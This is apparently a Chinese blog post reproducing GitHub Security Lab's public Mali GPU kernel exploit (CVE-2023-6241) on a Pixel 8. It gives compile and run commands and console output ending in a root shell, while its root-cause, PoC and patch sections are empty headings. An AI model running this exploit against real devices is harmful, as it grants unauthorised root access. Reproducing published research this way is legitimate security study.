对这篇文章 Gaining kernel code execution on an MTE-enabled Pixel 8 的分析与复现
Arm Mali GPU
(买了台 pixel8,也刚好拿来当备用机~)
- 镜像版本:UD1A.231105.004
- ndk版本:26.2.11394342
- open-cl header版本:v2023.04.17
复现
- 编译
# 1. 拉依赖库
╰─ adb pull vendor/lib64/egl/libGLES_mali.so .
# 2. 拷贝opencl header到exp目录
╰─ cp -r ../OpenCL-Headers-2023.04.17/CL .
# 3. 编译
╰─ /Users/lzx/Library/Android/sdk/ndk/26.2.11394342/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf
# 4. 得到 mali_jit_csf
- 运行
╰─ adb push mali_jit_csf /data/local/tmp
╰─ adb shell
shiba:/ $ cd /data/local/tmp
shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_jit_csf
mali_fd 3
corrupted_jit_addr 6000001000
kernel success
kernel success
queue kernel
jit_grow addr 6000001000
Size after grow: 22f6
Final grow size: 23c7
keep alive jit_addr 60023d1000
Size after free: 21fd, trim_level 6
writing to gpu_va 6002301000
found reused page 5fffef6000, 0
pgd entry found at index 0 400008972ef443
overwrite addr : 5ffff00b50 b50
overwrite addr : 5fffb00b50 b50
overwrite addr : 5fff900b50 b50
overwrite addr : 5ffff00714 714
overwrite addr : 5fffb00714 714
overwrite addr : 5fff900714 714
result 50
shiba:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
shiba:/data/local/tmp # getenforce
getenforce: Couldn't get enforcing status: No such file or directory
1|shiba:/data/local/tmp # ^C
130|shiba:/data/local/tmp # ^D
shiba:/data/local/tmp $
第一次运行的时候,确实如readme里所说卡住了,第二次运行就没事了。
When running the first time, the exploit sometimes stalls after printing the last
overwrite addrmessage. If that happens (stalled for more than 10 seconds, though pausing for a few seconds is normal), then simply kill the exploit and rerun it. It should not stall the second time.
漏洞根因
PoC
Patch
结论
参考文献
- https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/
- https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2023_6241
- https://developers.google.com/android/images?hl=zh-cn
- https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17